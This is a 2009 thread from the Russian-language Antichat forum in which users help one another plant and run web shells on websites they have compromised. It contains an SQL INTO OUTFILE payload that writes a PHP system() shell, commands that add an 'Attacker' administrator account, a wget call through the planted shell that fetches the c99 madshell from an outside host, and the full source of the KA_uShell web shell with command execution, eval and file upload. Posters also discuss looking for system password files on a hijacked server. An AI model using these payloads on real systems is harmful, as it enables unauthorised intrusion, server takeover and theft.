ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.12.2009, 19:08
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от wkar
Parse error: syntax error, unexpected '<' in D:\www\jo.php on line 2 как исправить?
Вообще то это было сделано для того, чтобы ты сам поправил, но ладно...
SELECT '<?=system($_GET["cmd"])?>' FROM table_name INTO OUTFILE '/var/www/shell.php'
|
|
|
01.12.2009, 19:19
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
Провел на форуме:
115825
Репутация:
0
|
|
Люди , ситауция -
залил через скуль шел на сайт .
сайт под виндовс .
при создании файла с содержимым - "<?php system($_GET['cmd']); ?>" и вызовом функции site.com/cmd.php?cmd=dir
ничего не отображается..что же делать ? как по рутать ..
Есть доступ и права на запись ко всему диску С:
думал сделать нечто такое --
net user Attacker 12345 /add
net localgroup Administrators Attacker /add
net localgroup Remotedesktopuser Attacker /add
,.. но вот не задача цмд не работает ..Что делоть?  |
|
|
|
01.12.2009, 19:23
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
safe mode on?
|
|
|
|
01.12.2009, 19:24
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
Провел на форуме:
115825
Репутация:
0
|
|
Software: . PHP/5.2.10
uname -a: Windows NT 238878-WEB1 5.2 build 3790
IUSR_238878-WEB1
Safe-mode: OFF (not secure)
C:\ drwxrwxrwx
Free 125.12 GB of 136.69 GB (91.54%)
|
|
|
|
01.12.2009, 19:28
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Сообщение от wkar
http://site/cmd.php?cmd=wget http://madnet.name/files/download/9_c99madshell.php -O shell.php
http://site/cmd.php?cmd='wget http://madnet.name/files/download/9_c99madshell.php -O shell.php'
Не пишет в файл. Команда дир пашет.
помоему вгета нет в винде =)))
юзай фтп.
Последний раз редактировалось p.r0phe.t; 01.12.2009 в 19:32..
|
|
|
|
01.12.2009, 19:42
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Выполни phpinfo()
В disable_functions Есть что нить?
|
|
|
|
01.12.2009, 19:45
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
Как залить шелл в e-commerce?
|
|
|
|
01.12.2009, 19:46
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от apekoff
Software: . PHP/5.2.10
uname -a: Windows NT 238878-WEB1 5.2 build 3790
IUSR_238878-WEB1
Safe-mode: OFF (not secure)
C:\ drwxrwxrwx
Free 125.12 GB of 136.69 GB (91.54%)
Прав нету пользователю создавать пользователей, наверно...
|
|
|
|
01.12.2009, 20:05
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
Провел на форуме:
115825
Репутация:
0
|
|
Сообщение от mailbrush
Прав нету пользователю создавать пользователей, наверно...
с чего такие выводы ? я же говорю что не выолняется cmd ,тоесть не выполняется даже листинг ..и залил я шел только после того как в скуле залил следующий код аплоадера
Код:
\
/+--------------------------------+\\ \
| KA_uShell | \
| <KAdot Universal Shell> | \
| Version 0.1.6 | \
| 13.03.04 | \
| Author: KAdot <KAdot@ngs.ru> | \
|--------------------------------| \
\\+ +/ \
\
--> \
<html> \
<head> \
<title>KA_uShell 0.1.6</title> \
<style type="text/css"> \
<!-- \
body, table{font-family:Verdana; font-size:12px;} \
table {background-color:#EAEAEA; border-width:0px;} \
b {font-family:Arial; font-size:15px;} \
a{text-decoration:none;} \
--> \
</style> \
</head> \
<body> \
\
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
// Configuration
$login = "admin";
$pass = "123";
/*/ Authentication \
if (!isset($_SERVER['PHP_AUTH_USER'])) { \
header('WWW-Authenticate: Basic realm="KA_uShell"'); \
header('HTTP/1.0 401 Unauthorized'); \
exit;} \
\
else { \
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login) \
{ echo "Что надо?"; exit;} \
} \
*/
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "shell";}
// Menu
echo " \
|<a href=$self?ac=shell>Shell</a>| \
|<a href=$self?ac=upload>File Upload</a>| \
|<a href=$self?ac=tools>Tools</a>| \
|<a href=$self?ac=eval>PHP Eval Code</a>| \
|<a href=$self?ac=whois>Whois</a>| \
<br><br><br><pre>";
switch($ac) {
// Shell
case "shell":
echo <<<HTML \
<b>Shell</b> \
<table> \
<form action="$self" method="POST"> \
<input type="hidden" name="ac" value="shell"> \
<tr><td> \
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter"> \
</td></tr> \
<tr><td> \
<textarea cols="100" rows="25"> \
HTML;
if (!empty($_POST['c'])){
passthru($_POST['c']);
}
echo "</textarea></td>$tend";
break;
//PHP Eval Code execution
case "eval":
echo <<<HTML \
<b>PHP Eval Code</b> \
<table> \
<form method="POST" action="$self"> \
<input type="hidden" name="ac" value="eval"> \
<tr> \
<td><textarea name="ephp" rows="10" cols="60"></textarea></td> \
</tr> \
<tr> \
<td><input type="submit" value="Enter"></td> \
$tend \
HTML;
if (isset($_POST['ephp'])){
eval($_POST['ephp']);
}
break;
//Text tools
case "tools":
echo <<<HTML \
<b>Tools</b> \
<table> \
<form method="POST" action="$self"> \
<input type="hidden" name="ac" value="tools"> \
<tr> \
<td> \
<input type="radio" name="tac" value="1">B64 Decode<br> \
<input type="radio" name="tac" value="2">B64 Encode<br><hr> \
<input type="radio" name="tac" value="3">md5 Hash \
</td> \
<td><textarea name="tot" rows="5" cols="42"></textarea></td> \
</tr> \
<tr> \
<td> </td> \
<td><input type="submit" value="Enter"></td> \
$tend \
HTML;
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
switch($_POST['tac']) {
case "1":
echo "Раскодированный текст:<b>" .base64_decode($_POST['tot']). "</b>";
break;
case "2":
echo "Кодированный текст:<b>" .base64_encode($_POST['tot']). "</b>";
break;
case "3":
echo "Кодированный текст:<b>" .md5($_POST['tot']). "</b>";
break;
}}
break;
// Uploading
case "upload":
echo <<<HTML \
<b>File Upload</b> \
<table> \
<form enctype="multipart/form-data" action="$self" method="POST"> \
<input type="hidden" name="ac" value="upload"> \
<tr> \
<td>Файло:</td> \
<td><input size="48" name="file" type="file"></td> \
</tr> \
<tr> \
<td>Папка:</td> \
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Послать"></td> \
$tend \
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Файло успешно загружен в папку $uploadfile\\n";
echo "Имя:" .$_FILES['file']['name']. "\\n";
echo "Размер:" .$_FILES['file']['size']. "\\n";
} else {
print "Не удаётся загрузить файло. Инфа:\\n";
print_r($_FILES);
}
}
break;
// Whois
case "whois":
echo <<<HTML \
<b>Whois</b> \
<table> \
<form action="$self" method="POST"> \
<input type="hidden" name="ac" value="whois"> \
<tr> \
<td>Домен:</td> \
<td><input size="40" type="text" name="wq"></td> \
</tr> \
<tr> \
<td>Хуйз сервер:</td> \
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td> \
</tr> \
<tr><td> \
<input align="right" type="submit" value="Enter"> \
</td></tr> \
$tend \
HTML;
if (isset($_POST['wq']) && $_POST['wq']<>"") {
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
$querty = $_POST['wq']."\\r\\n";
$fp = fsockopen($wser, 43);
if (!$fp) {echo "Не могу открыть сокет";} else {
fputs($fp, $querty);
while(!feof($fp)){echo fgets($fp, 4000);}
fclose($fp);
}}
break;
}
?> \
</pre> \
</body> \
</html>
- а уже тем аплоадером залил шелл , кстати во всех шеллах известных - r57 madshel c99 c100 не работает аплоад
|
|
|
|
01.12.2009, 22:52
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Есть такой шелл... http://mailbrush.eu/shell.php Вопрос в том, где есть системные файлы??? В корене сайта даже намеков нету... Или это не корень? Поиск файла passwd показывает лишь ерунду какую-то... То есть не сис. файлы...
Код:
/www/phpBB2/includes/usercp_sendpasswd.php
/www/phpBB2/language/lang_en...ail/user_activate_passwd.tpl
/www/phpBB2/language/lang_po...ail/user_activate_passwd.tpl
/www/phpBB3/language/en/email/user_activate_passwd.txt
/www/phpBB3/language/pl/email/user_activate_passwd.txt
апд:
хм, они скрытые оказывается, т.к. все норм показывает, и самое главное - если в шелле выбрать директорию /etc, то откроется нормально, но в списке директории "/" папки etc нету) кому интерестно - за шеллом в асю
Последний раз редактировалось mailbrush; 01.12.2009 в 22:57..
Причина: решил
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
